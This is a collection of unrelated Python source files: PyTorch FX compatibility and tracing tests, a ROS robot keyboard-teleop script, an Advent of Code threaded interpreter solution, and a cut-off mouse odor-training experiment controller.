torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
        # Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but not with type annotation
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable object like modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
                # inspect.signature raises ValueError when no signature is available
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
        # Checking for mutable operations while tracing is feature-flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
keyboard_teleop.py
|
#!/usr/bin/env python
# Author: Silvia Knappe
# Control movo with keyboard teleop, moves base and torso!
import rospy
from geometry_msgs.msg import Twist
from movo.system_defines import TRACTOR_REQUEST
from movo_msgs.msg import ConfigCmd, LinearActuatorCmd
from sensor_msgs.msg import JointState
import sys, select, termios, tty, threading
class KeyboardTeleop:
def __init__(self):
self.msg = """
Use the keyboard to move around!
--------------------------------
W
A D
S
to translate
------------
R
Q E
F
to rotate to move torso
--------------------------------
"""
self.basemoves = {
'w':[1,0,0],
'a':[0,1,0],
's':[-1,0,0],
'd':[0,-1,0],
'q':[0,0,1],
'e':[0,0,-1]
}
self.torsomoves = {
'r' : .002,
'f' : -.002
}
self.base_pub = rospy.Publisher('/movo/cmd_vel', Twist, queue_size=1)
self.cfg_cmd = ConfigCmd()
self.cfg_pub = rospy.Publisher('/movo/gp_command', ConfigCmd, queue_size=1)
self.torso_pub = rospy.Publisher('/movo/linear_actuator_cmd', LinearActuatorCmd, queue_size=1)
self.r = rospy.Rate(10)
self.thread = threading.Thread(target=self.setGP)
self.thread_r = rospy.Rate(1)
self.kill = False
self.current_pos = None
rospy.Subscriber('/movo/linear_actuator/joint_states', JointState, self.joint_state_cb)
self.settings = termios.tcgetattr(sys.stdin)
def joint_state_cb(self, msg):
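        # Latch the torso position only when it has been cleared; start() resets
        # current_pos to None after each command so the next command uses a fresh reading.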
assert msg.name[0] == 'linear_joint'
if self.current_pos is None:
self.current_pos = msg.position[0]
def getKey(self):
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd,termios.TCSADRAIN,old)
return ch
def setGP(self):
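        # Background thread: keep requesting tractor (drive) mode at 1 Hz so the base
        # continues to accept velocity commands while the teleop loop runs.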
while not rospy.is_shutdown() and not self.kill:
self.cfg_cmd.gp_cmd = 'GENERAL_PURPOSE_CMD_SET_OPERATIONAL_MODE'
self.cfg_cmd.gp_param = TRACTOR_REQUEST
self.cfg_cmd.header.stamp = rospy.get_rostime()
self.cfg_pub.publish(self.cfg_cmd)
self.thread_r.sleep()
def start(self):
print self.msg
self.thread.start()
while not rospy.is_shutdown():
try:
twist = Twist()
lincmd = LinearActuatorCmd()
key = self.getKey()
v_x = 0
v_y = 0
a_z = 0
torso_dz = 0
if key in self.basemoves:
v_x = self.basemoves[key][0]
v_y = self.basemoves[key][1]
a_z = self.basemoves[key][2]
elif key in self.torsomoves:
torso_dz = self.torsomoves[key]
else:
v_x = 0
v_y = 0
a_z = 0
torso_dz = 0
if (key == '\x03'):
print "Goodbye!"
self.kill = True
break
twist.linear.x = v_x
twist.linear.y = v_y
twist.angular.z = a_z
self.current_pos += torso_dz
lincmd.desired_position_m = self.current_pos
self.torso_pub.publish(lincmd)
self.base_pub.publish(twist)
self.current_pos = None
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.settings)
except Exception as e:
print(e)
if __name__ == "__main__":
rospy.init_node('keyboard_teleop')
kt = KeyboardTeleop()
kt.start()
|
main_part2.py
|
#!/usr/bin/env python
import threading
import time
from queue import Queue
lock = threading.Lock()
state = {
0: {
'is_waiting': False,
'q': Queue()
},
1: {
'is_waiting': False,
'q': Queue()
}
}
def get_value(val, registers):
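    # Resolve a token to an integer: numeric literals parse directly, otherwise the
    # token is treated as a register name and its contents are resolved recursively.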
try:
return int(val)
    except ValueError:
try:
return get_value(registers[val], registers)
        except KeyError:
print(registers)
def play(instructions, prog_id):
i = 0
registers = {'p': prog_id}
sending_values = 0
other_prog_id = (prog_id + 1) % 2
while i < len(instructions):
instruction = instructions[i].strip()
command = instruction[:3]
register = instruction[4]
value = instruction[6:]
if not register in registers:
registers[register] = 0
if command == 'snd':
lock.acquire()
value = get_value(register, registers)
state[other_prog_id]['q'].put(value)
state[other_prog_id]['is_waiting'] = False
sending_values += 1
lock.release()
elif command == 'set':
registers[register] = value
elif command == 'add':
val = get_value(value, registers)
registers[register] = get_value(register, registers) + val
elif command == 'mul':
val = get_value(value, registers)
registers[register] = get_value(register, registers) * val
elif command == 'mod':
val = get_value(value, registers)
registers[register] = get_value(register, registers) % val
elif command == 'rcv':
            # Deadlock detection: if our queue is empty, mark this program as waiting and
            # spin until a value arrives or both programs are waiting (a true deadlock).
if(state[prog_id]['q'].qsize() == 0):
lock.acquire()
state[prog_id]['is_waiting'] = True
lock.release()
while(True):
lock.acquire()
if not state[prog_id]['is_waiting']:
print ("NOT WAITING ANYMORE \n %s" % state)
lock.release()
break
if state[other_prog_id]['is_waiting']:
print ("DEADLOCK STATE \n %s" % str(state))
print ("PROGRAM %d SENT %d VALUES" % (prog_id, sending_values))
lock.release()
return
lock.release()
lock.acquire()
registers[register] = state[prog_id]['q'].get()
lock.release()
elif command == 'jgz':
if get_value(register, registers) > 0:
i += get_value(value, registers)
continue
i+=1
if __name__ == '__main__':
f = open('/Users/kosta/dev/advent-of-code-17/day18/input.txt', 'r')
instructions = f.readlines()
f.close()
t1 = threading.Thread(target=play, args=(instructions,0))
t1.start()
t2 = threading.Thread(target=play, args=(instructions,1))
t2.start()
t1.join()
t2.join()
|
fmos_trainer#2_for_non-spatial_DONTUSE.py
|
'''
FMON Trainer 2 - Freely Moving Odor Navigation - ODOR ASSOCIATION
Written: Teresa Findley, tmfindley15@gmail.com
Last Updated: 9/23/17
--Records tracking data via OSC from custom code in Bonsai (open source computer vision software -- https://bonsai-rx.org/)
--Records signal data through NI USB-6009
--Controls solenoid and beambreak hardware through Arduino Mega2560 & Teensyduino 2.0
'''
# [SET UP] #
##IMPORTS
##libraries
import numpy as np, cv2, os
import time, math, random, datetime
from timeit import default_timer as timer
import OSC, threading, Queue
import nidaqmx, ctypes
import matplotlib.pyplot as plt
from nidaqmx.constants import AcquisitionType, Edge
from nidaqmx.stream_readers import AnalogMultiChannelReader
##local modules
from fmon_preferences_bonsai import *
import fmon_datamgt, fmon_tracking, fmon_serial
##INITIATE VARIABLES
session_num = 1; trial_num = 1; state = 1;
port_val = leftport; leftcount = 0; rightcount = 0; nosepokecount = 0; msg = 0
last_occupancy = 0; section_occupancy = 0; concentration_setting = 0; response = 1; prep_odor = True; iti_delay = iti_correct; #trial information
correct0=0; total0=0; correct0L=0; total0L=0; correct0R=0; total0R=0; counter = 0 #counter: frames of continuous occupancy in the response zone (used in State 2)
odor_calibration = np.genfromtxt('Z:/FMON_Project/data/olfactometercalibration.txt', delimiter = ',') #odor calibration array
datapath,session_num = fmon_datamgt.CHK_directory(mouse_id,group_name,session_num) #update/create datapath
trialsummary_file = datapath + 'trialsummary.txt'; video_file = datapath + 'videolocation.txt'
notes_file = datapath + 'notes.txt'
ch0_file = datapath + ch0 + '.dat'; ch1_file = datapath + ch1 + '.dat' #NI signal files
ch2_file = datapath + ch2 + '.dat'; ch3_file = datapath + ch3 + '.dat'
nx_file = datapath + 'nosex.dat'; ny_file = datapath + 'nosey.dat' #bonsai tracking files
hx_file = datapath + 'headx.dat'; hy_file = datapath + 'heady.dat'
cx_file = datapath + 'comx.dat'; cy_file = datapath + 'comy.dat'
ts_file = datapath + 'timestamp.dat'
receive_address = ('localhost', 6666); trackingcoords = OSC.OSCServer(receive_address); #bonsai tracking variables
qnosex = Queue.LifoQueue(0); qnosey = Queue.LifoQueue(0); #online position storage
nosex = np.zeros((1,1)); nosey = np.zeros((1,1));
headx = np.zeros((1,1)); heady = np.zeros((1,1))
comx = np.zeros((1,1)); comy = np.zeros((1,1))
ts = np.zeros((1,1));
signaldata = np.zeros((channel_num,buffersize),dtype=np.float64) #NI data collection reading variables
reader = AnalogMultiChannelReader(ni_data.in_stream)
##START UP PROCEDURES
section,section_center=fmon_tracking.calc_partitions() #online tracking: gridline deliniation
fmon_serial.close_all_valves() #turn off all hardware
#Session Summary
#Create/Open Data Files
ch0_handle = open(ch0_file,'ab'); ch1_handle = open(ch1_file,'ab'); ch2_handle = open(ch2_file,'ab'); ch3_handle = open(ch3_file,'ab');
nx_handle = open(nx_file,'ab'); ny_handle = open(ny_file,'ab'); hx_handle = open(hx_file,'ab')
hy_handle = open(hy_file,'ab'); cx_handle = open(cx_file,'ab'); cy_handle = open(cy_file,'ab')
ts_handle = open(ts_file,'ab')
#Bonsai Start Up
trackingcoords.addDefaultHandlers() #add default handlers to the server
def msg_handler(addr, tags, coords, source):
qnosex.put(coords[0]); qnosey.put(coords[1]); #online storage of nose position
nosex[0,0] = coords[0]; nosey[0,0] = coords[1]
headx[0,0] = coords[2]; heady[0,0] = coords[3]
comx[0,0] = coords[4]; comy[0,0] = coords[5]
ts[0,0] = timer()-session_start;
nosex.tofile(nx_handle); nosey.tofile(ny_handle)
headx.tofile(hx_handle); heady.tofile(hy_handle)
comx.tofile(cx_handle); comy.tofile(cy_handle)
ts.tofile(ts_handle)
trackingcoords.addMsgHandler("/2python",msg_handler) #add msg handler function to server
bonsaitracking = threading.Thread( target = trackingcoords.serve_forever ) #put server in parallel thread
bonsaitracking.daemon = True
#NI Set Up
ni_data.ai_channels.add_ai_voltage_chan(channels) #add channels to server
ni_data.timing.cfg_samp_clk_timing(samplingrate, '',Edge.RISING,AcquisitionType.CONTINUOUS,uInt64(buffersize)) #instruct how to sample
def ni_handler(): #define background function to handle incoming NI data
while True:
reader.read_many_sample(signaldata,number_of_samples_per_channel= buffersize, timeout=10.0)
signaldata[0,:].tofile(ch0_handle); signaldata[1,:].tofile(ch1_handle);
signaldata[2,:].tofile(ch2_handle); signaldata[3,:].tofile(ch3_handle);
nisignal = threading.Thread(target = ni_handler) #set handler function in background
nisignal.daemon = True
##INITIATE SESSION
print "Subject " + str(mouse_id) + ", Session " + str(session_num) #report session initiation
print "System Ready. Initiating Data Collection..."
bonsaitracking.start();
nose = [qnosex.get(),qnosey.get()];
session_start = timer() #session timer
ni_data.start(); nisignal.start(); #start data collection
localtime = datetime.datetime.now(); #stamp for video locator
print "Session Started."
# [MAIN CODE] #
while True:
# [State *](occurs in all states)
#Nosepoke & Timer
while ard.inWaiting() > 0: #check nosepoke status
msg = fmon_serial.nose_poke_status(msg)
if timer() - session_start >= session_length:
fmon_serial.close_all_valves()
reasonforend = "Auto Session End"
break
#Online Tracking
nose = [qnosex.get(),qnosey.get()]; #check nose position
section_occupancy = fmon_tracking.detect_mouse_partitions(nose,section_center,
section_occupancy) #section occupancy
if show_active_stats == True: #online trial statistics
frame = cv2.imread('Z:/FMON_Project/data/statsbackground.jpeg')
height, width, depth = frame.shape #white background
fraction_correct = "Total: "+str(correct0)
fraction_left = "Left: "+str(correct0L)
fraction_right = "Right: "+str(correct0R)
#Stats Display
cv2.putText(frame,'Percent Correct', (130,(height/2)-40), cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))
cv2.putText(frame,fraction_correct, (80,(height/2)-20), cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))
cv2.putText(frame,fraction_left,(80,height/2),cv2.FONT_HERSHEY_PLAIN,1,(0,0,0))
cv2.putText(frame,fraction_right,(80,(height/2)+20),cv2.FONT_HERSHEY_PLAIN,1,(0,0,0))
cv2.imshow('Session Statistics',frame)
##Manual Session Termination
if cv2.waitKey(1) & 0xFF == ord('q'):
fmon_serial.close_all_valves()
reasonforend = "Manual Exit"
break
# [State 1] TRIAL INITIATION
if state == 1:
if prep_odor == True:
low_valve, correctpoke,nameoftrialtype,correctindex,incorrectindex = fmon_datamgt.trial_values(port_val)
active_valve = 1
#Set MFC Settings to Fit Non-Spatial
HairR = odor_calibration[1,0]; Hn2R = odor_calibration[1,1]
HairL = odor_calibration[1,2]; Hn2L = odor_calibration[1,3]
LairR = odor_calibration[1,4]; Ln2R = odor_calibration[1,5]
LairL = odor_calibration[1,6]; Ln2L = odor_calibration[1,7]
activevial = odor_vial; lowvial = odor_vial
#Turn on MFCs
